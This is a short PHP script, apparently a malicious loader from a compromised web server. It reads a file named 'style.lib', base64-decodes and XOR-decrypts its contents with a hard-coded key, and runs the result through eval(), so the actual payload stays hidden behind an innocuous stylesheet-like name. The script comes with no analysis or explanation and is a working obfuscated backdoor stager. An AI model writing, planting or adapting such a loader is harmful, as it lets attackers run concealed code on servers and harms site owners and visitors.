<?Php $key="A52ee98f09a"; function xors($string, $key) { $text = $string; $outText = ""; for($i=0; $i<strlen($text); ) { for($j=0; ($j<strlen($key) && $i<strlen($text)); $j++,$i++) { $outText .= $text{$i} ^ $key{$j}; } } return $outText; } $a=file_get_contents("style.lib"); $b=$a.""; $c=base64_decode($b); $d=xors($c, $key); eval($d);